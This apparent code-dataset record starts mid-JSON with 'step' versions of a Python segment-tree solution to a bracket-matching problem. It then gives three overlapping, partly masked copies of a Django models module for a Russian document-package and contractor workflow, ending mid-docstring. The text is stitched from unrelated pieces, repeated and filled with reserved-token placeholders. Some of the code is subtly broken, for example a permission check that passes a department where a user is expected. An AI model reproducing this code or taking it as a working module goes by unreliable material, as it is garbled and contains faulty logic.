input().split())\n print(2 * query(s, 0, n - 1, l - 1, r - 1, st, 0)[0])\n",
"step-5": "from math import ceil, log2, sqrt\r\n\r\ndef constructST(s, start, end, st, i):\r\n\tif start == end:\r\n\t\tst[i] = 0\r\n\t\topenst[i] = 1 if s[start] == '(' else 0\r\n\t\tclosedst[i] = 1 if s[start] == ')' else 0\r\n\t\treturn st[i], openst[i], closedst[i]\r\n\r\n\telse:\r\n\t\tmid = (start+end)//2\r\n\t\tst[i], openst[i], closedst[i] = constructST(s, start, mid, st, 2*i+1) \r\n\t\ta, b, c = constructST(s, mid+1, end, st, 2*i+2)\r\n\t\ttmp = min(openst[2*i+1], closedst[2*i+2])\r\n\t\tst[i] += tmp + a\r\n\t\topenst[i] += b-tmp\r\n\t\tclosedst[i] += c -tmp\r\n\r\n\t\treturn st[i], openst[i], closedst[i]\r\n\r\ndef query(s, start, end, l, r, st, i):\r\n\tif l > end or r < start:\r\n\t\treturn 0, 0, 0\r\n\telif start >= l and end <= r:\r\n\t\treturn st[i], openst[i], closedst[i]\r\n\telse:\r\n\t\tmid = (start + end)//2\r\n\t\ta, b, c = query(s, start, mid, l, r, st, 2*i+1) \r\n\t\td, e, f = query(s, mid+1, end, l, r, st, 2*i+2)\r\n\t\ttmp = min(b, f)\r\n\t\tT = a+d +tmp\r\n\t\tO = b+e - tmp\r\n\t\tC = c+f - tmp\r\n\treturn T, O, C\r\n\r\n\r\n\r\ns = input()\r\nn = len(s)\r\nx = int(ceil(log2(n)))\r\nmax_size = 2*pow(2, x) -1\t\r\n\r\nst = [0 for i in range(0, max_size)]\r\nopenst = [0 for i in range(0, max_size)]\r\nclosedst = [0 for i in range(0, max_size)]\r\n\r\nconstructST(s, 0, n-1, st, 0)\r\n# print(st)\r\n# print(openst)\r\n# print(closedst)\r\nfor _ in range(int(input())):\r\n\tl, r = map(int, input().split())\r\n\tprint(2*query(s, 0, n-1, l-1, r-1, st, 0)[0])\r\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class ActExam(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@classmethod
def get_files_path(cls, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
ActExam.initialize_folder(tmp_path)
return os.path.join(tmp_path, cls.FOLDER)
def clear_file(self):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
self.file_path = None
self.file_name = None
self.save()
def delete(self, using=None, keep_parents=False):
self.clear_file()
return super().delete(using=using, keep_parents=keep_parents)
class DocumentsPackage(models.Model):
""" Модель пакета документов.
contragent - ID контрагента
name_uuid - Уникальный ID пакета (каждый раз новый)
is_active - Является ли пакет активным. Если True, то пакет в работе. Если
False, то пакет закрыт.
is_automatic - Создан ли пакет автоматически или пользователь может
редактировать наборы файлов и некоторые характеристики. Если
True, то нельзя подгружать свои договора и редактировать
debt_plan. Если False, то редактирование возможно.
creation_date - Дата создания пакета.
debt_plan - Сумма долга. Если is_automatic == True, то значение не
редактируется. Если is_automatic == False, то значение
необходимо заполнить.
debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.
tax_count - Госпошлина. Можно заполнять в любом случае.
package_users - Все пользователи пакета, работавшие с ним.
package_state - Состояние пакета.
package_state_date - Дата изменения состояния пакета.
single_files - Пакет одиночных документов.
pack_files - Пакет наборов файлов.
other_files - Произвольные файлы.
commentary - Комментарии.
"""
contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,
related_name='contragents', related_query_name='contragent', null=
True, blank=True)
name_uuid = models.CharField('Идентификатор пакета', max_length=255,
default=uuid.uuid4, null=True, blank=True, editable=False)
is_active = models.BooleanField('Активный пакет', default=True)
is_automatic = models.BooleanField('Создан автоматически', default=True)
creation_date = models.DateField('Дата создания пакета', auto_now_add=True)
debt_plan = models.FloatField('Сумма задолжности (плановая)', default=0.0)
debt_fact = models.FloatField('Сумма задолжности (фактическая)',
default=0.0)
tax_count = models.FloatField('Госпошлина', default=0.0)
package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,
related_name='packages')
package_state = models.ForeignKey('State', on_delete=models.CASCADE,
null=True, blank=True)
package_state_date = models.DateField('Дата последнего действия', null=
True, blank=True)
single_files = GenericRelation(SingleFile)
pack_files = GenericRelation(PackFile)
other_files = GenericRelation(OtherFile)
commentary = GenericRelation(Commentary, related_query_name='package')
act = models.ForeignKey(ActExam, on_delete=models.CASCADE, null=True,
blank=True)
def __str__(self):
return f'Пакет {self.name_uuid}'
def get_save_path(self):
if self.contragent:
return os.path.join(self.contragent.get_str_as_path(), str(self
.name_uuid))
else:
return f'{self.name_uuid}'
@classmethod
def get_active_package(cls, contragent: Contragent):
try:
res = cls.objects.get(contragent__id=contragent.pk, is_active=True)
return res
except ObjectDoesNotExist:
return None
def initialize_sub_folders(self):
os.makedirs(str(self.get_save_path()), exist_ok=True)
def is_user_in_package(self, user, use_department=False):
users = self.package_users.all()
if use_department:
depts = [tmp_user.department for tmp_user in users]
return user.department in depts or user in users
return user in users
def set_inactive(self):
self.is_active = False
self.save()
def change_state_to(self, new_state, is_backward):
self.package_state = new_state
self.package_state_date = datetime.date.today()
if not is_backward:
async_task(calc_create_gen_async, self.contragent, self, False,
group=self.name_uuid)
self.save()
class Meta:
verbose_name_plural = 'Пакеты документов'
class DocumentStateEntity(models.Model):
documents = models.ManyToManyField('DocumentTypeModel', related_name=
'document_type')
states = models.ForeignKey('State', related_name='states', on_delete=
models.CASCADE, blank=True, null=True)
template = models.ForeignKey('DocumentFileTemplate', on_delete=models.
CASCADE, blank=True, null=True)
class DocumentFileTemplate(models.Model):
contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
is_package = models.BooleanField('Набор файлов', default=False)
def __str__(self):
return KLASS_TYPES[self.contagent_type][1]
class Meta:
verbose_name_plural = 'Шаблоны файлов'
class NormativeCategory(models.Model):
""" Класс Категории норматива """
name = models.CharField('Вид объекта', max_length=255)
norm_type = models.IntegerField('Показатель расчета', default=0,
choices=NORM_TYPE, blank=True, null=True)
normative = models.ManyToManyField('Normative', related_name=
'normatives', verbose_name='Нормативы')
def __str__(self):
return self.name
@property
def print_norm_type(self):
return NORM_TYPE[self.norm_type][1]
class Meta:
verbose_name_plural = 'Категории нормативов'
class Normative(models.Model):
""" Класс норматива """
since_date = models.DateField('Дата начала действия норматива', null=
True, blank=True)
up_to_date = models.DateField('Дата окончания действия норматива', null
=True, blank=True)
value = models.FloatField('Значение норматива (год.)', null=True, blank
=True)
def __str__(self):
return (f'Норматив: {self.value}/год.,' +
f" действующий с {self.since_date.strftime('%d.%m.%Y')}" +
f" по {self.up_to_date.strftime('%d.%m.%Y')}")
class Meta:
verbose_name_plural = 'Нормативы'
class Contract(models.Model):
""" Класс контракта. Нужен что бы получать уникальный номер контракта.
Сохраняет дату когда был создан, для корректной генерации строкового
представления.
"""
date_field = models.DateField(auto_now_add=True)
def __str__(self):
return f'{self.pk:06}-{self.date_field.year}/ТКО/01'
class Meta:
verbose_name_plural = 'Сгенерированые номера договоров'
class ContractNumberClass(models.Model):
""" Модель класса прокси для соединения класса документа и контрагента.
Принимает на вход необязательные параметры:
new - определяем, надо генерировать новый номер или есть
старый. Булево значение. True = генерируем;
exist_number - существующий номер договора. Строка;
У класса есть такие поля как:
is_generated - хранит булево значение. Определяет был ли сгенерирован
номер или взят из внешних источников;
contract_obj - объект модели самого номера контракта;
contract_exist_number - существующий номер контракта. Пустая строка,
если мы сгенерировали новый номер;
contract_number - возвращает строковое представление номера, независимо
от того, сгенерирован код или получен из внешнего
источника.
"""
is_generated = models.BooleanField(default=False)
contract_obj = models.OneToOneField(Contract, on_delete=models.CASCADE,
null=True, blank=True)
contract_exist_number = models.CharField(default='', max_length=255,
null=True, blank=True)
@classmethod
def create(cls, new: bool=False, exist_number: str=''):
contract_num_obj = cls(is_generated=new)
if new:
contract_num_obj.contract_obj = Contract.objects.create()
else:
contract_num_obj.contract_exist_number = exist_number
contract_num_obj.save()
return contract_num_obj
@property
def contract_number(self):
if self.is_generated:
return str(self.contract_obj)
else:
return self.contract_exist_number
def __str__(self):
return self.contract_number
class Meta:
verbose_name_plural = 'Номера договоров'
class SyncUniqueNumber(models.Model):
def __str__(self):
return f'{self.pk:08}/01'
class Meta:
verbose_name_plural = 'Номера документов'
class CityModel(models.Model):
name = models.CharField('Город', max_length=255, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'Города'
class TemplateModel(models.Model):
template_path = models.CharField('Путь до шаблона', max_length=255)
city = models.ForeignKey(CityModel, on_delete=models.CASCADE)
contragent_type = models.IntegerField('Тип контрагента', choices=
KLASS_TYPES, default=0)
document_type = models.ForeignKey('DocumentTypeModel', verbose_name=
'Тип документа', on_delete=models.CASCADE)
def __str__(self):
return (
f'{str(self.document_type)}| {KLASS_TYPES[self.contragent_type][1]}|{self.city}'
)
class Meta:
verbose_name_plural = 'Шаблоны документов'
class DocumentTypeModel(models.Model):
doc_type = models.CharField('Тип документа', max_length=255, null=True,
blank=True)
is_pack = models.BooleanField('Пакет документов', default=False)
def __str__(self):
return self.doc_type
class Meta:
verbose_name_plural = 'Типы документов'
class State(models.Model):
name_state = models.CharField('Состояние', max_length=255)
departments = models.ManyToManyField('yellowbird.Department',
verbose_name='Отделы', related_name='available_states')
is_initial_state = models.BooleanField('Начальное состояние', default=False
)
is_final_state = models.BooleanField('Конечное состояние', default=False)
def get_linked_events(self):
return Event.objects.filter(from_state=self.id)
def _is_dept_permitted(self, department):
return department in self.departments.all()
def is_permitted(self, user):
return user.is_superuser or user.is_staff or self._is_dept_permitted(
user.department)
def __str__(self):
return self.name_state
class Meta:
verbose_name_plural = 'Состояния'
class Event(models.Model):
name_event = models.CharField('Событие', max_length=255)
from_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Исходное состояние', blank=True, null=True,
related_name='begin_states')
to_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Конечное состояние', blank=True, null=True,
related_name='end_states')
is_move_backward = models.BooleanField('Двигаемся обратно назад',
default=False)
def __str__(self):
return self.name_event
class Meta:
verbose_name_plural = 'События'
class ListStrategy(ABC):
@abstractmethod
def execute_list_strategy(self, user):
raise NotImplementedError
@abstractmethod
def execute_single_strategy(self, pk, user):
raise NotImplementedError
class OnlyEmptyRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return [c for c in contragents if not c.active_package]
def execute_single_strategy(self, pk, user):
try:
res = Contragent.objects.get(pk=pk)
return res if not res.active_package else None
except Contragent.DoesNotExist:
return None
class OnlyMyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.filter(current_user__contain=user)
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk, current_user__contain=user)
except Contragent.DoesNotExist:
return None
class AllRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk)
except Contragent.DoesNotExist:
return None
class AllInDepartmentRecords(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user.department):
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_list = [(c.department == user.department) for c in
contragent.current_user]
if any(tmp_list):
return contragent
return None
return contragent
except Contragent.DoesNotExist:
return None
class MyAndEmptyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user) and user in c.current_user:
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user
) and user in contragent.current_user:
return contragent
return contragent
except Contragent.DoesNotExist:
return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SignUser(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __str__(self):
return f'{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}'
<|reserved_special_token_0|>
class Meta:
verbose_name_plural = 'Отвественные лица с правом подписи'
class Commentary(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.
CASCADE, blank=True, null=True)
commentary_text = models.TextField('Комментарий', blank=True, null=True)
creation_date = models.DateTimeField('Дата создания', auto_now_add=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
class AbstractFileModel(models.Model):
file_name = models.CharField('Название файла', max_length=255, null=
True, blank=True)
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
creation_date = models.DateField('Дата создания файла', blank=True,
null=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
file_type = models.ForeignKey('DocumentTypeModel', on_delete=models.CASCADE
)
def delete(self, using=None, keep_parents=False):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
return super().delete(using=using, keep_parents=keep_parents)
class Meta:
abstract = True
class SingleFile(AbstractFileModel):
def __str__(self):
return str(self.file_type)
class Meta:
verbose_name_plural = 'Единичные файлы'
class PackFile(AbstractFileModel):
unique_number = models.ForeignKey('SyncUniqueNumber', on_delete=models.
CASCADE, null=True, blank=True)
class Meta:
abstract = False
verbose_name_plural = 'Фаилы набора'
def initialize_folder(self, path: str):
if self.file_type:
tmp_str_path = plur_form(self.file_type.doc_type)
if not os.path.isdir(f'{path}/{tmp_str_path}/'):
os.makedirs(f'{path}/{tmp_str_path}/')
else:
raise AttributeError()
def get_files_path(self, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
self.initialize_folder(tmp_path)
return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')
<|reserved_special_token_0|>
class OtherFile(AbstractFileModel):
file_obj = models.FileField('Произвольные файлы', upload_to=
other_files_directory_path, max_length=500)
commentary = GenericRelation(Commentary, related_query_name='file')
class Meta:
verbose_name_plural = 'Прочие файлы'
class ActExam(models.Model):
FOLDER = 'Акт осмотра/'
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
file_name = models.CharField('Название файла', max_length=255, null=
True, blank=True)
@classmethod
def initialize_folder(cls, path: str):
tmp_path = f'{path}/{cls.FOLDER}'
if not os.path.isdir(tmp_path):
os.makedirs(tmp_path)
@classmethod
def get_files_path(cls, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
ActExam.initialize_folder(tmp_path)
return os.path.join(tmp_path, cls.FOLDER)
def clear_file(self):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
self.file_path = None
self.file_name = None
self.save()
def delete(self, using=None, keep_parents=False):
self.clear_file()
return super().delete(using=using, keep_parents=keep_parents)
class DocumentsPackage(models.Model):
""" Модель пакета документов.
contragent - ID контрагента
name_uuid - Уникальный ID пакета (каждый раз новый)
is_active - Является ли пакет активным. Если True, то пакет в работе. Если
False, то пакет закрыт.
is_automatic - Создан ли пакет автоматически или пользователь может
редактировать наборы файлов и некоторые характеристики. Если
True, то нельзя подгружать свои договора и редактировать
debt_plan. Если False, то редактирование возможно.
creation_date - Дата создания пакета.
debt_plan - Сумма долга. Если is_automatic == True, то значение не
редактируется. Если is_automatic == False, то значение
необходимо заполнить.
debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.
tax_count - Госпошлина. Можно заполнять в любом случае.
package_users - Все пользователи пакета, работавшие с ним.
package_state - Состояние пакета.
package_state_date - Дата изменения состояния пакета.
single_files - Пакет одиночных документов.
pack_files - Пакет наборов файлов.
other_files - Произвольные файлы.
commentary - Комментарии.
"""
contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,
related_name='contragents', related_query_name='contragent', null=
True, blank=True)
name_uuid = models.CharField('Идентификатор пакета', max_length=255,
default=uuid.uuid4, null=True, blank=True, editable=False)
is_active = models.BooleanField('Активный пакет', default=True)
is_automatic = models.BooleanField('Создан автоматически', default=True)
creation_date = models.DateField('Дата создания пакета', auto_now_add=True)
debt_plan = models.FloatField('Сумма задолжности (плановая)', default=0.0)
debt_fact = models.FloatField('Сумма задолжности (фактическая)',
default=0.0)
tax_count = models.FloatField('Госпошлина', default=0.0)
package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,
related_name='packages')
package_state = models.ForeignKey('State', on_delete=models.CASCADE,
null=True, blank=True)
package_state_date = models.DateField('Дата последнего действия', null=
True, blank=True)
single_files = GenericRelation(SingleFile)
pack_files = GenericRelation(PackFile)
other_files = GenericRelation(OtherFile)
commentary = GenericRelation(Commentary, related_query_name='package')
act = models.ForeignKey(ActExam, on_delete=models.CASCADE, null=True,
blank=True)
def __str__(self):
return f'Пакет {self.name_uuid}'
def get_save_path(self):
if self.contragent:
return os.path.join(self.contragent.get_str_as_path(), str(self
.name_uuid))
else:
return f'{self.name_uuid}'
@classmethod
def get_active_package(cls, contragent: Contragent):
try:
res = cls.objects.get(contragent__id=contragent.pk, is_active=True)
return res
except ObjectDoesNotExist:
return None
def initialize_sub_folders(self):
os.makedirs(str(self.get_save_path()), exist_ok=True)
def is_user_in_package(self, user, use_department=False):
users = self.package_users.all()
if use_department:
depts = [tmp_user.department for tmp_user in users]
return user.department in depts or user in users
return user in users
def set_inactive(self):
self.is_active = False
self.save()
def change_state_to(self, new_state, is_backward):
self.package_state = new_state
self.package_state_date = datetime.date.today()
if not is_backward:
async_task(calc_create_gen_async, self.contragent, self, False,
group=self.name_uuid)
self.save()
class Meta:
verbose_name_plural = 'Пакеты документов'
class DocumentStateEntity(models.Model):
documents = models.ManyToManyField('DocumentTypeModel', related_name=
'document_type')
states = models.ForeignKey('State', related_name='states', on_delete=
models.CASCADE, blank=True, null=True)
template = models.ForeignKey('DocumentFileTemplate', on_delete=models.
CASCADE, blank=True, null=True)
class DocumentFileTemplate(models.Model):
contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
is_package = models.BooleanField('Набор файлов', default=False)
def __str__(self):
return KLASS_TYPES[self.contagent_type][1]
class Meta:
verbose_name_plural = 'Шаблоны файлов'
class NormativeCategory(models.Model):
""" Класс Категории норматива """
name = models.CharField('Вид объекта', max_length=255)
norm_type = models.IntegerField('Показатель расчета', default=0,
choices=NORM_TYPE, blank=True, null=True)
normative = models.ManyToManyField('Normative', related_name=
'normatives', verbose_name='Нормативы')
def __str__(self):
return self.name
@property
def print_norm_type(self):
return NORM_TYPE[self.norm_type][1]
class Meta:
verbose_name_plural = 'Категории нормативов'
class Normative(models.Model):
""" Класс норматива """
since_date = models.DateField('Дата начала действия норматива', null=
True, blank=True)
up_to_date = models.DateField('Дата окончания действия норматива', null
=True, blank=True)
value = models.FloatField('Значение норматива (год.)', null=True, blank
=True)
def __str__(self):
return (f'Норматив: {self.value}/год.,' +
f" действующий с {self.since_date.strftime('%d.%m.%Y')}" +
f" по {self.up_to_date.strftime('%d.%m.%Y')}")
class Meta:
verbose_name_plural = 'Нормативы'
class Contract(models.Model):
""" Класс контракта. Нужен что бы получать уникальный номер контракта.
Сохраняет дату когда был создан, для корректной генерации строкового
представления.
"""
date_field = models.DateField(auto_now_add=True)
def __str__(self):
return f'{self.pk:06}-{self.date_field.year}/ТКО/01'
class Meta:
verbose_name_plural = 'Сгенерированые номера договоров'
class ContractNumberClass(models.Model):
""" Модель класса прокси для соединения класса документа и контрагента.
Принимает на вход необязательные параметры:
new - определяем, надо генерировать новый номер или есть
старый. Булево значение. True = генерируем;
exist_number - существующий номер договора. Строка;
У класса есть такие поля как:
is_generated - хранит булево значение. Определяет был ли сгенерирован
номер или взят из внешних источников;
contract_obj - объект модели самого номера контракта;
contract_exist_number - существующий номер контракта. Пустая строка,
если мы сгенерировали новый номер;
contract_number - возвращает строковое представление номера, независимо
от того, сгенерирован код или получен из внешнего
источника.
"""
is_generated = models.BooleanField(default=False)
contract_obj = models.OneToOneField(Contract, on_delete=models.CASCADE,
null=True, blank=True)
contract_exist_number = models.CharField(default='', max_length=255,
null=True, blank=True)
@classmethod
def create(cls, new: bool=False, exist_number: str=''):
contract_num_obj = cls(is_generated=new)
if new:
contract_num_obj.contract_obj = Contract.objects.create()
else:
contract_num_obj.contract_exist_number = exist_number
contract_num_obj.save()
return contract_num_obj
@property
def contract_number(self):
if self.is_generated:
return str(self.contract_obj)
else:
return self.contract_exist_number
def __str__(self):
return self.contract_number
class Meta:
verbose_name_plural = 'Номера договоров'
class SyncUniqueNumber(models.Model):
def __str__(self):
return f'{self.pk:08}/01'
class Meta:
verbose_name_plural = 'Номера документов'
class CityModel(models.Model):
name = models.CharField('Город', max_length=255, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = 'Города'
class TemplateModel(models.Model):
template_path = models.CharField('Путь до шаблона', max_length=255)
city = models.ForeignKey(CityModel, on_delete=models.CASCADE)
contragent_type = models.IntegerField('Тип контрагента', choices=
KLASS_TYPES, default=0)
document_type = models.ForeignKey('DocumentTypeModel', verbose_name=
'Тип документа', on_delete=models.CASCADE)
def __str__(self):
return (
f'{str(self.document_type)}| {KLASS_TYPES[self.contragent_type][1]}|{self.city}'
)
class Meta:
verbose_name_plural = 'Шаблоны документов'
class DocumentTypeModel(models.Model):
doc_type = models.CharField('Тип документа', max_length=255, null=True,
blank=True)
is_pack = models.BooleanField('Пакет документов', default=False)
def __str__(self):
return self.doc_type
class Meta:
verbose_name_plural = 'Типы документов'
class State(models.Model):
name_state = models.CharField('Состояние', max_length=255)
departments = models.ManyToManyField('yellowbird.Department',
verbose_name='Отделы', related_name='available_states')
is_initial_state = models.BooleanField('Начальное состояние', default=False
)
is_final_state = models.BooleanField('Конечное состояние', default=False)
def get_linked_events(self):
return Event.objects.filter(from_state=self.id)
def _is_dept_permitted(self, department):
return department in self.departments.all()
def is_permitted(self, user):
return user.is_superuser or user.is_staff or self._is_dept_permitted(
user.department)
def __str__(self):
return self.name_state
class Meta:
verbose_name_plural = 'Состояния'
class Event(models.Model):
name_event = models.CharField('Событие', max_length=255)
from_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Исходное состояние', blank=True, null=True,
related_name='begin_states')
to_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Конечное состояние', blank=True, null=True,
related_name='end_states')
is_move_backward = models.BooleanField('Двигаемся обратно назад',
default=False)
def __str__(self):
return self.name_event
class Meta:
verbose_name_plural = 'События'
class ListStrategy(ABC):
@abstractmethod
def execute_list_strategy(self, user):
raise NotImplementedError
@abstractmethod
def execute_single_strategy(self, pk, user):
raise NotImplementedError
class OnlyEmptyRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return [c for c in contragents if not c.active_package]
def execute_single_strategy(self, pk, user):
try:
res = Contragent.objects.get(pk=pk)
return res if not res.active_package else None
except Contragent.DoesNotExist:
return None
class OnlyMyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.filter(current_user__contain=user)
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk, current_user__contain=user)
except Contragent.DoesNotExist:
return None
class AllRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk)
except Contragent.DoesNotExist:
return None
class AllInDepartmentRecords(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user.department):
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_list = [(c.department == user.department) for c in
contragent.current_user]
if any(tmp_list):
return contragent
return None
return contragent
except Contragent.DoesNotExist:
return None
class MyAndEmptyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user) and user in c.current_user:
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user
) and user in contragent.current_user:
return contragent
return contragent
except Contragent.DoesNotExist:
return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SignUser(models.Model):
name = models.CharField('ФИО отвественного лица', max_length=255)
document = models.IntegerField('Документ основания', choices=DOC_TYPE,
default=0)
position = models.IntegerField('Должность', choices=POST_TYPE, default=0)
doc_number = models.CharField('Номер документа', max_length=255)
doc_date = models.DateField('Дата начала действия документа')
address = models.CharField('Адресс', max_length=255)
city = models.ForeignKey('CityModel', on_delete=models.CASCADE, blank=
True, null=True)
tel_number = models.CharField('Телефон', max_length=255, default='')
sign = models.ImageField('Подпись', upload_to='signs/', blank=True,
null=True)
def __str__(self):
return f'{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}'
def save(self, *args, **kwargs):
instance = SignUser.objects.get(id=self.id)
if self.sign != instance.sign and instance.sign:
if os.path.exists(instance.sign.url):
os.remove(instance.sign.url)
super().save(*args, **kwargs)
class Meta:
verbose_name_plural = 'Отвественные лица с правом подписи'
class Commentary(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.
CASCADE, blank=True, null=True)
commentary_text = models.TextField('Комментарий', blank=True, null=True)
creation_date = models.DateTimeField('Дата создания', auto_now_add=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
class AbstractFileModel(models.Model):
file_name = models.CharField('Название файла', max_length=255, null=
True, blank=True)
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
creation_date = models.DateField('Дата создания файла', blank=True,
null=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
file_type = models.ForeignKey('DocumentTypeModel', on_delete=models.CASCADE
)
def delete(self, using=None, keep_parents=False):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
return super().delete(using=using, keep_parents=keep_parents)
class Meta:
abstract = True
class SingleFile(AbstractFileModel):
def __str__(self):
return str(self.file_type)
class Meta:
verbose_name_plural = 'Единичные файлы'
class PackFile(AbstractFileModel):
unique_number = models.ForeignKey('SyncUniqueNumber', on_delete=models.
CASCADE, null=True, blank=True)
class Meta:
abstract = False
verbose_name_plural = 'Фаилы набора'
def initialize_folder(self, path: str):
if self.file_type:
tmp_str_path = plur_form(self.file_type.doc_type)
if not os.path.isdir(f'{path}/{tmp_str_path}/'):
os.makedirs(f'{path}/{tmp_str_path}/')
else:
raise AttributeError()
def get_files_path(self, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
self.initialize_folder(tmp_path)
return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')
<|reserved_special_token_0|>
class OtherFile(AbstractFileModel):
file_obj = models.FileField('Произвольные файлы', upload_to=
other_files_directory_path, max_length=500)
commentary = GenericRelation(Commentary, related_query_name='file')
class Meta:
verbose_name_plural = 'Прочие файлы'
class ActExam(models.Model):
FOLDER = 'Акт осмотра/'
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
file_name = models.CharField('Название файла', max_length=255, null=
True, blank=True)
@classmethod
def initialize_folder(cls, path: str):
tmp_path = f'{path}/{cls.FOLDER}'
if not os.path.isdir(tmp_path):
os.makedirs(tmp_path)
@classmethod
def get_files_path(cls, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
ActExam.initialize_folder(tmp_path)
return os.path.join(tmp_path, cls.FOLDER)
def clear_file(self):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
self.file_path = None
self.file_name = None
self.save()
def delete(self, using=None, keep_parents=False):
self.clear_file()
return super().delete(using=using, keep_parents=keep_parents)
class DocumentsPackage(models.Model):
""" Модель пакета документов.
contragent - ID контрагента
name_uuid - Уникальный ID пакета (каждый раз новый)
is_active - Является ли пакет активным. Если True, то пакет в работе. Если
False, то пакет закрыт.
is_automatic - Создан ли пакет автоматически или пользователь может
редактировать наборы файлов и некоторые характеристики. Если
True, то нельзя подгружать свои договора и редактировать
debt_plan. Если False, то редактирование возможно.
creation_date - Дата создания пакета.
debt_plan - Сумма долга. Если is_automatic == True, то значение не
редактируется. Если is_automatic == False, то значение
необходимо заполнить.
debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.
